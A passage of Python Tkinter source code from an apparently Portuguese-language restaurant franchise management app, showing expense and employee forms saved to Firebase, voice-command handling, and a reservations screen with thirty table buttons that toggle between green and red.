self.franquiaselecionada)\r\n self.janelaadddespesa.destroy()\r\n \r\n def removerdespesa(self): \r\n self.janelardespesa = tk.Toplevel()\r\n self.janelardespesa.wm_title(\"Remover despesa\")\r\n self.janelardespesa.geometry(\"400x300\")\r\n self.janelardespesa.configure(bg = \"sandy brown\")\r\n self.nomedespesar = tk.Label(self.janelardespesa, text = \"Nome: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomedespesarentry = tk.Entry(self.janelardespesa, bg = \"peru\")\r\n self.nomedespesar.place(x = 50, y = 40)\r\n self.nomedespesarentry.place(x = 190, y = 40)\r\n self.bremoverdespesaj = tk.Button(self.janelardespesa, bg = \"peru\", fg = \"black\", text = \"Remover despesa\", command = self.removerdespesatabela, height= 2, width = 40)\r\n self.bremoverdespesaj.place(x = 55, y = 225)\r\n \r\n def removerdespesatabela(self):\r\n self.franquiaselecionada[\"Dados\"][\"NDespesas\"] -= int(self.franquiaselecionada[\"Despesas\"][self.nomedespesarentry.get()][\"valor\"])\r\n del self.franquiaselecionada[\"Despesas\"][self.nomedespesarentry.get()]\r\n firebase.patch(self.selecionada, self.franquiaselecionada)\r\n self.janelardespesa.destroy()\r\n self.tabledespesas.delete(*self.tabledespesas.get_children())\r\n try:\r\n self.tabledespesas.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.franquiaselecionada[\"Despesas\"]:\r\n self.tabledespesas.insert(\"\", 1, \"\" , text = i, values = (self.franquiaselecionada[\"Despesas\"][i][\"valor\"], self.franquiaselecionada[\"Despesas\"][i][\"desc\"]), tags = (\"Cor\"))\r\n self.tabledespesas.configure(height = len(self.tabledespesas.get_children()))\r\n except:\r\n pass\r\n \r\n \r\n \r\n def adicionarfuncionario(self):\r\n self.janelaaddfuncionario = tk.Toplevel()\r\n self.janelaaddfuncionario.wm_title(\"Adicionar funcionário\")\r\n self.janelaaddfuncionario.geometry(\"400x350\")\r\n self.janelaaddfuncionario.configure(bg = \"sandy brown\")\r\n self.nomefuncionario = tk.Label(self.janelaaddfuncionario, text = \"Nome: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomefuncionarioentry = tk.Entry(self.janelaaddfuncionario, bg = \"peru\")\r\n self.idadefuncionario = tk.Label(self.janelaaddfuncionario, text = \"Idade: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.idadefuncionarioentry = tk.Entry(self.janelaaddfuncionario, bg = \"peru\")\r\n self.cpffuncionario = tk.Label(self.janelaaddfuncionario, text = \"CPF: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.cpffuncionarioentry = tk.Entry(self.janelaaddfuncionario, bg = \"peru\")\r\n self.salariofuncionario = tk.Label(self.janelaaddfuncionario, text = \"Salário: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.salariofuncionarioentry = tk.Entry(self.janelaaddfuncionario, bg = \"peru\")\r\n self.funcaofuncionario = tk.Label(self.janelaaddfuncionario, text = \"Função: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.funcaofuncionarioentry = tk.Entry(self.janelaaddfuncionario, bg = \"peru\")\r\n self.datafuncionario = tk.Label(self.janelaaddfuncionario, text = \"Data de Início: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.datafuncionarioentry = tk.Entry(self.janelaaddfuncionario, bg = \"peru\")\r\n self.nomefuncionario.place(x = 50, y= 40)\r\n self.nomefuncionarioentry.place(x = 190, y = 40)\r\n self.idadefuncionario.place(x = 50, y= 80)\r\n self.idadefuncionarioentry.place(x = 190, y = 80)\r\n self.cpffuncionario.place(x = 50, y= 120)\r\n self.cpffuncionarioentry.place(x = 190, y = 120)\r\n self.salariofuncionario.place(x = 50, y= 160)\r\n self.salariofuncionarioentry.place(x = 190, y = 160)\r\n self.funcaofuncionario.place(x = 50, y= 200)\r\n self.funcaofuncionarioentry.place(x = 190, y = 200)\r\n self.datafuncionario.place(x = 50, y= 240)\r\n self.datafuncionarioentry.place(x = 190, y = 240)\r\n self.baddfuncionarioa = tk.Button(self.janelaaddfuncionario, bg = \"peru\", fg = \"black\", text = \"Adicionar funcionário\", command = self.inserirfuncionario, height= 2, width = 40)\r\n self.baddfuncionarioa.place(x = 50, y = 280)\r\n \r\n\r\n def inserirfuncionario(self):\r\n self.tablefuncionarios.insert(\"\", 1, \"\" , text = self.nomefuncionarioentry.get(), values = (self.idadefuncionarioentry.get(), self.cpffuncionarioentry.get(), self.salariofuncionarioentry.get(), self.funcaofuncionarioentry.get(), self.datafuncionarioentry.get()), tags = (\"Cor\"))\r\n self.tablefuncionarios.tag_configure(\"Cor\", background = \"bisque2\")\r\n self.tablefuncionarios.configure(height = len(self.tablefuncionarios.get_children()))\r\n self.franquiaselecionada[\"Funcionarios\"][self.nomefuncionarioentry.get()] = {\"idade\" : self.idadefuncionarioentry.get(), \"cpf\": self.cpffuncionarioentry.get(), \"salario\": self.salariofuncionarioentry.get(), \"funcao\": self.funcaofuncionarioentry.get(), \"data\": self.datafuncionarioentry.get()}\r\n self.franquiaselecionada[\"Dados\"][\"NFuncionarios\"] += 1\r\n self.franquiaselecionada[\"Dados\"][\"NDespesas\"] += int(self.salariofuncionarioentry.get())\r\n firebase.patch(self.selecionada, self.franquiaselecionada)\r\n self.janelaaddfuncionario.destroy()\r\n \r\n def removerfuncionario(self):\r\n self.janelaremoverfuncionario = tk.Toplevel()\r\n self.janelaremoverfuncionario.wm_title(\"Remover funcionário\")\r\n self.janelaremoverfuncionario.geometry(\"400x300\")\r\n self.janelaremoverfuncionario.configure(bg = \"sandy brown\")\r\n self.nomeremoverfuncionario = tk.Label(self.janelaremoverfuncionario, text = \"Nome: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomerfuncionarioentry = tk.Entry(self.janelaremoverfuncionario, bg = \"peru\")\r\n self.nomeremoverfuncionario.place(x = 50, y = 40)\r\n self.nomerfuncionarioentry.place(x = 190, y = 40)\r\n self.bremoverfuncionariosr = tk.Button(self.janelaremoverfuncionario, bg = \"peru\", fg = \"black\", text = \"Remover funcionário\", command = self.removerfuncionariotabela, height= 2, width = 40)\r\n self.bremoverfuncionariosr.place(x = 55, y = 225)\r\n \r\n def removerfuncionariotabela(self):\r\n self.franquiaselecionada[\"Dados\"][\"NDespesas\"] -= int(self.franquiaselecionada[\"Funcionarios\"][self.nomerfuncionarioentry.get()][\"salario\"])\r\n del self.franquiaselecionada[\"Funcionarios\"][self.nomerfuncionarioentry.get()]\r\n self.franquiaselecionada[\"Dados\"][\"NFuncionarios\"] -= 1\r\n \r\n firebase.patch(self.selecionada, self.franquiaselecionada)\r\n self.janelaremoverfuncionario.destroy()\r\n self.tablefuncionarios.delete(*self.tablefuncionarios.get_children())\r\n try:\r\n self.tablefuncionarios.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.franquiaselecionada[\"Funcionarios\"]:\r\n self.tablefuncionarios.insert(\"\", 1, \"\" , text = i, values = (self.franquiaselecionada[\"Funcionarios\"][i][\"idade\"], self.franquiaselecionada[\"Funcionarios\"][i][\"cpf\"], self.franquiaselecionada[\"Funcionarios\"][i][\"salario\"], self.franquiaselecionada[\"Funcionarios\"][i][\"funcao\"], self.franquiaselecionada[\"Funcionarios\"][i][\"data\"]), tags = (\"Cor\"))\r\n self.tablefuncionarios.configure(height = len(self.tablefuncionarios.get_children()))\r\n except:\r\n pass\r\n \r\n def voicebutton3(self):\r\n self.speak = wincl.Dispatch(\"SAPI.SpVoice\")\r\n self.r = sr.Recognizer()\r\n self.mic = sr.Microphone()\r\n\r\n\r\n with self.mic as source:\r\n self.audio = self.r.listen(source, phrase_time_limit = 2)\r\n print(self.r.recognize_google(self.audio, language = \"pt-BR\"))\r\n \r\n \r\n \r\n if self.r.recognize_google(self.audio, language = \"pt-BR\") == \"adicionar reserva\":\r\n try:\r\n self.adicionarreserva()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n \r\n \r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"remover reserva\":\r\n try:\r\n self.removereserva()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"editar reserva\":\r\n try:\r\n self.editarreserva()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n \r\n else:\r\n self.speak.Speak(\"Desculpe, não entendi. Por favor, tente novamente!\")\r\n \r\n def selecionarsalao(self):\r\n try:\r\n self.InventoryTitle.destroy()\r\n self.Inventory.destroy()\r\n self.InventoryEdit.destroy()\r\n self.InventoryAdd.destroy()\r\n self.Reposition.destroy()\r\n self.OrdersTitle.destroy()\r\n self.OrdersTable.destroy()\r\n self.PlaceOrder.destroy()\r\n self.EditOrder.destroy()\r\n self.RemoveOrder.destroy()\r\n self.voicecommand5.destroy()\r\n except:\r\n pass\r\n try: \r\n self.canvasmetas.destroy()\r\n self.metas.destroy()\r\n self.tablemetas.destroy()\r\n self.baddmetas.destroy()\r\n self.beditarmetas.destroy()\r\n self.bremovermetas.destroy()\r\n except:\r\n pass\r\n try: \r\n self.voicecommand4.destroy()\r\n except:\r\n pass\r\n try:\r\n self.voicecommand2.destroy()\r\n except:\r\n pass\r\n try:\r\n self.salao.configure(bg = \"black\", fg = \"white\")\r\n self.salao.configure(command = self.bloquear)\r\n self.adm.configure(command = self.selecionaradm)\r\n self.cozinha.configure(command = self.selecionarcozinha)\r\n except:\r\n pass\r\n \r\n try:\r\n self.adm.configure(bg = \"peru\", fg = \"black\")\r\n except:\r\n pass\r\n \r\n try:\r\n self.cozinha.configure(bg = \"peru\", fg = \"black\")\r\n except:\r\n pass\r\n self.voicecommand3 = tk.Button(self.mainwindow, bg = \"cyan\" , image = self.imagemmic1, command = self.voicebutton3, height= 50, width = 50)\r\n self.voicecommand3.image = self.imagemmic1\r\n self.voicecommand3.place(x = 420, y = 700)\r\n \r\n \r\n self.reservas = tk.Label(self.mainwindow, text = \"Reservas: \", font = (\"Verdana\", 20), bg= \"sandy brown\")\r\n self.reservas.place(x = 180, y = 100)\r\n \r\n \r\n self.tablereservas = ttk.Treeview(self.mainwindow, columns=(\"nome\", \"horario\", \"origem\", \"mesa\"))\r\n self.tablereservas.configure(height = 0)\r\n \r\n self.tablereservas.heading(\"#0\", text = \"ID\")\r\n self.tablereservas.heading(\"#1\", text = \"Nome\")\r\n self.tablereservas.heading(\"#2\", text = \"Horário\")\r\n self.tablereservas.heading(\"#3\", text = \"Origem\")\r\n self.tablereservas.heading(\"#4\", text = \"Mesa\")\r\n self.tablereservas.column(\"#0\", anchor = 'center', width=40)\r\n self.tablereservas.column(\"#1\", anchor = \"w\", width = 170)\r\n self.tablereservas.column(\"#2\", anchor='center', width=90)\r\n self.tablereservas.column(\"#3\", anchor='center', width=90) \r\n self.tablereservas.column(\"#4\", anchor='center', width=90)\r\n self.tablereservas.place(x= 20, y = 150)\r\n \r\n \r\n self.badicionarreserva = tk.Button(self.mainwindow, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Adicionar reserva\", command = self.adicionarreserva, height= 2, width = 40)\r\n self.bremoverreserva = tk.Button(self.mainwindow, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Remover reserva\", command = self.removereserva, height= 2, width = 40)\r\n self.beditareserva = tk.Button(self.mainwindow, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Editar reserva\", command = self.editarreserva, height= 2, width = 40)\r\n self.badicionarreserva.place(x = 80, y = 650)\r\n self.bremoverreserva.place(x = 80, y = 700)\r\n self.beditareserva.place(x = 80, y = 750)\r\n \r\n imagemlogosalao = ImageTk.PhotoImage(Image.open(\"Assets/Logo2.png\"))\r\n self.imagemslogosalao = tk.Label(self.mainwindow, image = imagemlogosalao, height = 282, width= 500, bg = \"sandy brown\")\r\n self.imagemslogosalao.image = imagemlogosalao\r\n self.imagemslogosalao.place(x = 1000, y = 250)\r\n \r\n \r\n \r\n \r\n \r\n \r\n try:\r\n self.bfuncionarios.destroy()\r\n self.bdespesas.destroy()\r\n self.blicensas.destroy()\r\n self.blogins.destroy()\r\n self.tablepromocoes.destroy()\r\n self.badicionarpromocao.destroy()\r\n self.beditarpromocao.destroy()\r\n self.bremoverpromocao.destroy()\r\n self.fundofinancas.destroy()\r\n self.tfaturamento.destroy()\r\n self.tbruta.destroy()\r\n self.tdespesas.destroy()\r\n self.tfuncionarios.destroy()\r\n self.tpedidos.destroy()\r\n self.totalmesas.destroy()\r\n self.treservas.destroy()\r\n self.gerenciamento.destroy()\r\n self.financas.destroy()\r\n self.promocoes.destroy()\r\n self.canvasmetas.destroy()\r\n self.metas.destroy()\r\n self.tablemetas.destroy()\r\n self.baddmetas.destroy()\r\n self.beditarmetas.destroy()\r\n self.bremovermetas.destroy()\r\n except:\r\n pass\r\n \r\n \r\n \r\n self.verde1 = ImageTk.PhotoImage(Image.open(\"Assets/1verde.png\"))\r\n self.verde2 = ImageTk.PhotoImage(Image.open(\"Assets/2verde.png\"))\r\n self.verde3 = ImageTk.PhotoImage(Image.open(\"Assets/3verde.png\"))\r\n self.verde4 = ImageTk.PhotoImage(Image.open(\"Assets/4verde.png\"))\r\n self.verde5 = ImageTk.PhotoImage(Image.open(\"Assets/5verde.png\"))\r\n self.verde6 = ImageTk.PhotoImage(Image.open(\"Assets/6verde.png\"))\r\n self.verde7 = ImageTk.PhotoImage(Image.open(\"Assets/7verde.png\"))\r\n self.verde8 = ImageTk.PhotoImage(Image.open(\"Assets/8verde.png\"))\r\n self.verde9 = ImageTk.PhotoImage(Image.open(\"Assets/9verde.png\"))\r\n self.verde10 = ImageTk.PhotoImage(Image.open(\"Assets/10verde.png\"))\r\n self.verde11 = ImageTk.PhotoImage(Image.open(\"Assets/11verde.png\"))\r\n self.verde12 = ImageTk.PhotoImage(Image.open(\"Assets/12verde.png\"))\r\n self.verde13 = ImageTk.PhotoImage(Image.open(\"Assets/13verde.png\"))\r\n self.verde14 = ImageTk.PhotoImage(Image.open(\"Assets/14verde.png\"))\r\n self.verde15 = ImageTk.PhotoImage(Image.open(\"Assets/15verde.png\"))\r\n self.verde16 = ImageTk.PhotoImage(Image.open(\"Assets/16verde.png\"))\r\n self.verde17 = ImageTk.PhotoImage(Image.open(\"Assets/17verde.png\"))\r\n self.verde18 = ImageTk.PhotoImage(Image.open(\"Assets/18verde.png\"))\r\n self.verde19 = ImageTk.PhotoImage(Image.open(\"Assets/19verde.png\"))\r\n self.verde20 = ImageTk.PhotoImage(Image.open(\"Assets/20verde.png\"))\r\n self.verde21 = ImageTk.PhotoImage(Image.open(\"Assets/21verde.png\"))\r\n self.verde22 = ImageTk.PhotoImage(Image.open(\"Assets/22verde.png\"))\r\n self.verde23 = ImageTk.PhotoImage(Image.open(\"Assets/23verde.png\"))\r\n self.verde24 = ImageTk.PhotoImage(Image.open(\"Assets/24verde.png\"))\r\n self.verde25 = ImageTk.PhotoImage(Image.open(\"Assets/25verde.png\"))\r\n self.verde26 = ImageTk.PhotoImage(Image.open(\"Assets/26verde.png\"))\r\n self.verde27 = ImageTk.PhotoImage(Image.open(\"Assets/27verde.png\"))\r\n self.verde28 = ImageTk.PhotoImage(Image.open(\"Assets/28verde.png\"))\r\n self.verde29 = ImageTk.PhotoImage(Image.open(\"Assets/29verde.png\"))\r\n self.verde30 = ImageTk.PhotoImage(Image.open(\"Assets/30verde.png\"))\r\n \r\n \r\n \r\n self.vermelho1 = ImageTk.PhotoImage(Image.open(\"Assets/1vermelho.png\"))\r\n self.vermelho2 = ImageTk.PhotoImage(Image.open(\"Assets/2vermelho.png\"))\r\n self.vermelho3 = ImageTk.PhotoImage(Image.open(\"Assets/3vermelho.png\"))\r\n self.vermelho4 = ImageTk.PhotoImage(Image.open(\"Assets/4vermelho.png\"))\r\n self.vermelho5 = ImageTk.PhotoImage(Image.open(\"Assets/5vermelho.png\"))\r\n self.vermelho6 = ImageTk.PhotoImage(Image.open(\"Assets/6vermelho.png\"))\r\n self.vermelho7 = ImageTk.PhotoImage(Image.open(\"Assets/7vermelho.png\"))\r\n self.vermelho8 = ImageTk.PhotoImage(Image.open(\"Assets/8vermelho.png\"))\r\n self.vermelho9 = ImageTk.PhotoImage(Image.open(\"Assets/9vermelho.png\"))\r\n self.vermelho10 = ImageTk.PhotoImage(Image.open(\"Assets/10vermelho.png\"))\r\n self.vermelho11 = ImageTk.PhotoImage(Image.open(\"Assets/11vermelho.png\"))\r\n self.vermelho12 = ImageTk.PhotoImage(Image.open(\"Assets/12vermelho.png\"))\r\n self.vermelho13 = ImageTk.PhotoImage(Image.open(\"Assets/13vermelho.png\"))\r\n self.vermelho14 = ImageTk.PhotoImage(Image.open(\"Assets/14vermelho.png\"))\r\n self.vermelho15 = ImageTk.PhotoImage(Image.open(\"Assets/15vermelho.png\"))\r\n self.vermelho16 = ImageTk.PhotoImage(Image.open(\"Assets/16vermelho.png\"))\r\n self.vermelho17 = ImageTk.PhotoImage(Image.open(\"Assets/17vermelho.png\"))\r\n self.vermelho18 = ImageTk.PhotoImage(Image.open(\"Assets/18vermelho.png\"))\r\n self.vermelho19 = ImageTk.PhotoImage(Image.open(\"Assets/19vermelho.png\"))\r\n self.vermelho20 = ImageTk.PhotoImage(Image.open(\"Assets/20vermelho.png\"))\r\n self.vermelho21 = ImageTk.PhotoImage(Image.open(\"Assets/21vermelho.png\"))\r\n self.vermelho22 = ImageTk.PhotoImage(Image.open(\"Assets/22vermelho.png\"))\r\n self.vermelho23 = ImageTk.PhotoImage(Image.open(\"Assets/23vermelho.png\"))\r\n self.vermelho24 = ImageTk.PhotoImage(Image.open(\"Assets/24vermelho.png\"))\r\n self.vermelho25 = ImageTk.PhotoImage(Image.open(\"Assets/25vermelho.png\"))\r\n self.vermelho26 = ImageTk.PhotoImage(Image.open(\"Assets/26vermelho.png\"))\r\n self.vermelho27 = ImageTk.PhotoImage(Image.open(\"Assets/27vermelho.png\"))\r\n self.vermelho28 = ImageTk.PhotoImage(Image.open(\"Assets/28vermelho.png\"))\r\n self.vermelho29 = ImageTk.PhotoImage(Image.open(\"Assets/29vermelho.png\"))\r\n self.vermelho30 = ImageTk.PhotoImage(Image.open(\"Assets/30vermelho.png\"))\r\n \r\n \r\n \r\n \r\n color = \"sandy brown\"\r\n \r\n \r\n self.verde1f = tk.Button(self.mainwindow, image = self.verde1, height = 50, width= 76, bg = color, command = self.vermelhot1)\r\n self.verde2f = tk.Button(self.mainwindow, image = self.verde2, height = 50, width= 76, bg = color, command = self.vermelhot2)\r\n self.verde3f = tk.Button(self.mainwindow, image = self.verde3, height = 50, width= 76, bg = color, command = self.vermelhot3)\r\n self.verde4f = tk.Button(self.mainwindow, image = self.verde4, height = 50, width= 76, bg = color, command = self.vermelhot4)\r\n self.verde5f = tk.Button(self.mainwindow, image = self.verde5, height = 50, width= 76, bg = color, command = self.vermelhot5)\r\n self.verde6f = tk.Button(self.mainwindow, image = self.verde6, height = 50, width= 76, bg = color, command = self.vermelhot6)\r\n self.verde7f = tk.Button(self.mainwindow, image = self.verde7, height = 50, width= 76, bg = color, command = self.vermelhot7)\r\n self.verde8f = tk.Button(self.mainwindow, image = self.verde8, height = 50, width= 76, bg = color, command = self.vermelhot8)\r\n self.verde9f = tk.Button(self.mainwindow, image = self.verde9, height = 50, width= 76, bg = color, command = self.vermelhot9)\r\n self.verde10f = tk.Button(self.mainwindow, image = self.verde10, height = 50, width= 76, bg = color, command = self.vermelhot10)\r\n self.verde11f = tk.Button(self.mainwindow, image = self.verde11, height = 50, width= 76, bg = color, command = self.vermelhot11)\r\n self.verde12f = tk.Button(self.mainwindow, image = self.verde12, height = 50, width= 76, bg = color, command = self.vermelhot12)\r\n self.verde13f = tk.Button(self.mainwindow, image = self.verde13, height = 50, width= 76, bg = color, command = self.vermelhot13)\r\n self.verde14f = tk.Button(self.mainwindow, image = self.verde14, height = 50, width= 76, bg = color, command = self.vermelhot14)\r\n self.verde15f = tk.Button(self.mainwindow, image = self.verde15, height = 50, width= 76, bg = color, command = self.vermelhot15)\r\n self.verde16f = tk.Button(self.mainwindow, image = self.verde16, height = 50, width= 76, bg = color, command = self.vermelhot16)\r\n self.verde17f = tk.Button(self.mainwindow, image = self.verde17, height = 50, width= 76, bg = color, command = self.vermelhot17)\r\n self.verde18f = tk.Button(self.mainwindow, image = self.verde18, height = 50, width= 76, bg = color, command = self.vermelhot18)\r\n self.verde19f = tk.Button(self.mainwindow, image = self.verde19, height = 50, width= 76, bg = color, command = self.vermelhot19)\r\n self.verde20f = tk.Button(self.mainwindow, image = self.verde20, height = 50, width= 76, bg = color, command = self.vermelhot20)\r\n self.verde21f = tk.Button(self.mainwindow, image = self.verde21, height = 50, width= 76, bg = color, command = self.vermelhot21)\r\n self.verde22f = tk.Button(self.mainwindow, image = self.verde22, height = 50, width= 76, bg = color, command = self.vermelhot22)\r\n self.verde23f = tk.Button(self.mainwindow, image = self.verde23, height = 50, width= 76, bg = color, command = self.vermelhot23)\r\n self.verde24f = tk.Button(self.mainwindow, image = self.verde24, height = 50, width= 76, bg = color, command = self.vermelhot24)\r\n self.verde25f = tk.Button(self.mainwindow, image = self.verde25, height = 50, width= 76, bg = color, command = self.vermelhot25)\r\n self.verde26f = tk.Button(self.mainwindow, image = self.verde26, height = 50, width= 76, bg = color, command = self.vermelhot26)\r\n self.verde27f = tk.Button(self.mainwindow, image = self.verde27, height = 50, width= 76, bg = color, command = self.vermelhot27)\r\n self.verde28f = tk.Button(self.mainwindow, image = self.verde28, height = 50, width= 76, bg = color, command = self.vermelhot28)\r\n self.verde29f = tk.Button(self.mainwindow, image = self.verde29, height = 50, width= 76, bg = color, command = self.vermelhot29)\r\n self.verde30f = tk.Button(self.mainwindow, image = self.verde30, height = 50, width= 76, bg = color, command = self.vermelhot30)\r\n \r\n \r\n \r\n \r\n \r\n self.vermelho1f = tk.Button(self.mainwindow, image = self.vermelho1, height = 50, width= 76, bg = color, command = self.verdet1)\r\n self.vermelho2f = tk.Button(self.mainwindow, image = self.vermelho2, height = 50, width= 76, bg = color, command = self.verdet2)\r\n self.vermelho3f = tk.Button(self.mainwindow, image = self.vermelho3, height = 50, width= 76, bg = color, command = self.verdet3)\r\n self.vermelho4f = tk.Button(self.mainwindow, image = self.vermelho4, height = 50, width= 76, bg = color, command = self.verdet4)\r\n self.vermelho5f = tk.Button(self.mainwindow, image = self.vermelho5, height = 50, width= 76, bg = color, command = self.verdet5)\r\n self.vermelho6f = tk.Button(self.mainwindow, image = self.vermelho6, height = 50, width= 76, bg = color, command = self.verdet6)\r\n self.vermelho7f = tk.Button(self.mainwindow, image = self.vermelho7, height = 50, width= 76, bg = color, command = self.verdet7)\r\n self.vermelho8f = tk.Button(self.mainwindow, image = self.vermelho8, height = 50, width= 76, bg = color, command = self.verdet8)\r\n self.vermelho9f = tk.Button(self.mainwindow, image = self.vermelho9, height = 50, width= 76, bg = color, command = self.verdet9)\r\n self.vermelho10f = tk.Button(self.mainwindow, image = self.vermelho10, height = 50, width= 76, bg = color, command = self.verdet10)\r\n self.vermelho11f = tk.Button(self.mainwindow, image = self.vermelho11, height = 50, width= 76, bg = color, command = self.verdet11)\r\n self.vermelho12f = tk.Button(self.mainwindow, image = self.vermelho12, height = 50, width= 76, bg = color, command = self.verdet12)\r\n self.vermelho13f = tk.Button(self.mainwindow, image = self.vermelho13, height = 50, width= 76, bg = color, command = self.verdet13)\r\n self.vermelho14f = tk.Button(self.mainwindow, image = self.vermelho14, height = 50, width= 76, bg = color, command = self.verdet14)\r\n self.vermelho15f = tk.Button(self.mainwindow, image = self.vermelho15, height = 50, width= 76, bg = color, command = self.verdet15)\r\n self.vermelho16f = tk.Button(self.mainwindow, image = self.vermelho16, height = 50, width= 76, bg = color, command = self.verdet16)\r\n self.vermelho17f = tk.Button(self.mainwindow, image = self.vermelho17, height = 50, width= 76, bg = color, command = self.verdet17)\r\n self.vermelho18f = tk.Button(self.mainwindow, image = self.vermelho18, height = 50, width= 76, bg = color, command = self.verdet18)\r\n self.vermelho19f = tk.Button(self.mainwindow, image = self.vermelho19, height = 50, width= 76, bg = color, command = self.verdet19)\r\n self.vermelho20f = tk.Button(self.mainwindow, image = self.vermelho20, height = 50, width= 76, bg = color, command = self.verdet20)\r\n self.vermelho21f = tk.Button(self.mainwindow, image = self.vermelho21, height = 50, width= 76, bg = color, command = self.verdet21)\r\n self.vermelho22f = tk.Button(self.mainwindow, image = self.vermelho22, height = 50, width= 76, bg = color, command = self.verdet22)\r\n self.vermelho23f = tk.Button(self.mainwindow, image = self.vermelho23, height = 50, width= 76, bg = color, command = self.verdet23)\r\n self.vermelho24f = tk.Button(self.mainwindow, image = self.vermelho24, height = 50, width= 76, bg = color, command = self.verdet24)\r\n self.vermelho25f = tk.Button(self.mainwindow, image = self.vermelho25, height = 50, width= 76, bg = color, command = self.verdet25)\r\n self.vermelho26f = tk.Button(self.mainwindow, image = self.vermelho26, height = 50, width= 76, bg = color, command = self.verdet26)\r\n self.vermelho27f = tk.Button(self.mainwindow, image = self.vermelho27, height = 50, width= 76, bg = color, command = self.verdet27)\r\n self.vermelho28f = tk.Button(self.mainwindow, image = self.vermelho28, height = 50, width= 76, bg = color, command = self.verdet28)\r\n self.vermelho29f = tk.Button(self.mainwindow, image = self.vermelho29, height = 50, width= 76, bg = color, command = self.verdet29)\r\n self.vermelho30f = tk.Button(self.mainwindow, image = self.vermelho30, height = 50, width= 76, bg = color, command = self.verdet30)\r\n \r\n \r\n self.verde1f.image = self.verde1\r\n self.verde2f.image = self.verde2\r\n self.verde3f.image = self.verde3\r\n self.verde4f.image = self.verde4\r\n self.verde5f.image = self.verde5\r\n self.verde6f.image = self.verde6\r\n self.verde7f.image = self.verde7\r\n self.verde8f.image = self.verde8\r\n self.verde9f.image = self.verde9\r\n self.verde10f.image = self.verde10\r\n self.verde11f.image = self.verde11\r\n self.verde12f.image = self.verde12\r\n self.verde13f.image = self.verde13\r\n self.verde14f.image = self.verde14\r\n self.verde15f.image = self.verde15\r\n self.verde16f.image = self.verde16\r\n self.verde17f.image = self.verde17\r\n self.verde18f.image = self.verde18\r\n self.verde19f.image = self.verde19\r\n self.verde20f.image = self.verde20\r\n self.verde21f.image = self.verde21\r\n self.verde22f.image = self.verde22\r\n self.verde23f.image = self.verde23\r\n self.verde24f.image = self.verde24\r\n self.verde25f.image = self.verde25\r\n self.verde26f.image = self.verde26\r\n self.verde27f.image = self.verde27\r\n self.verde28f.image = self.verde28\r\n self.verde29f.image = self.verde29\r\n self.verde30f.image = self.verde30\r\n \r\n \r\n self.vermelho1f.image = self.vermelho1\r\n self.vermelho2f.image = self.vermelho2\r\n self.vermelho3f.image = self.vermelho3\r\n self.vermelho4f.image = self.vermelho4\r\n self.vermelho5f.image = self.vermelho5\r\n self.vermelho6f.image = self.vermelho6\r\n self.vermelho7f.image = self.vermelho7\r\n self.vermelho8f.image = self.vermelho8\r\n self.vermelho9f.image = self.vermelho9\r\n self.vermelho10f.image = self.vermelho10\r\n self.vermelho11f.image = self.vermelho11\r\n self.vermelho12f.image = self.vermelho12\r\n self.vermelho13f.image = self.vermelho13\r\n self.vermelho14f.image = self.vermelho14\r\n self.vermelho15f.image = self.vermelho15\r\n self.vermelho16f.image = self.vermelho16\r\n self.vermelho17f.image = self.vermelho17\r\n self.vermelho18f.image = self.vermelho18\r\n self.vermelho19f.image = self.vermelho19\r\n self.vermelho20f.image = self.vermelho20\r\n self.vermelho21f.image = self.vermelho21\r\n self.vermelho22f.image = self.vermelho22\r\n self.vermelho23f.image = self.vermelho23\r\n self.vermelho24f.image = self.vermelho24\r\n self.vermelho25f.image = self.vermelho25\r\n self.vermelho26f.image = self.vermelho26\r\n self.vermelho27f.image = self.vermelho27\r\n self.vermelho28f.image = self.vermelho28\r\n self.vermelho29f.image = self.vermelho29\r\n self.vermelho30f.image = self.vermelho30\r\n \r\n \r\n# listaverdes = [\"verde1f\",\"verde2f\",\"verde3f\",\"verde4f\",\"verde5f\",\"verde6f\",\"verde7f\",\"verde8f\",\"verde9f\",\"verde10f\",\"verde11f\",\"verde12f\",\"verde13f\",\"verde14f\",\"verde15f\",\"verde16f\",\"verde17f\",\"verde18f\",\"verde19f\",\"verde20f\"]\r\n \r\n# for i in range(0, len(listaverdes)+1):\r\n# a = listaverdes[i]\r\n# if i < 4:\r\n# self.str(a).place(x = 20+(i*10) , y = 50) \r\n# if i > 4 and i < 9:\r\n# self.str(a).place(x = 20+(i*10) , y = 100)\r\n# if i > 9 and i < 14:\r\n# self.str(a).place(x = 20+(i*10) , y = 150)\r\n# if i > 14 and i < 19:\r\n# self.str(a).place(x = 20+(i*10) , y = 200)\r\n# \r\n self.verde1f.place(x = 525, y = 150)\r\n self.verde2f.place(x = 625, y = 150)\r\n self.verde3f.place(x = 725, y = 150)\r\n self.verde4f.place(x = 825, y = 150)\r\n self.verde5f.place(x = 925, y = 150)\r\n self.verde6f.place(x = 525, y = 250)\r\n self.verde7f.place(x = 625, y = 250)\r\n self.verde8f.place(x = 725, y = 250)\r\n self.verde9f.place(x = 825, y = 250)\r\n self.verde10f.place(x = 925, y = 250)\r\n self.verde11f.place(x = 525, y = 350)\r\n self.verde12f.place(x = 625, y = 350)\r\n self.verde13f.place(x = 725, y = 350)\r\n self.verde14f.place(x = 825, y = 350)\r\n self.verde15f.place(x = 925, y = 350)\r\n self.verde16f.place(x = 525, y = 450)\r\n self.verde17f.place(x = 625, y = 450)\r\n self.verde18f.place(x = 725, y = 450)\r\n self.verde19f.place(x = 825, y = 450)\r\n self.verde20f.place(x = 925, y = 450)\r\n self.verde21f.place(x = 525, y = 550)\r\n self.verde22f.place(x = 625, y = 550)\r\n self.verde23f.place(x = 725, y = 550)\r\n self.verde24f.place(x = 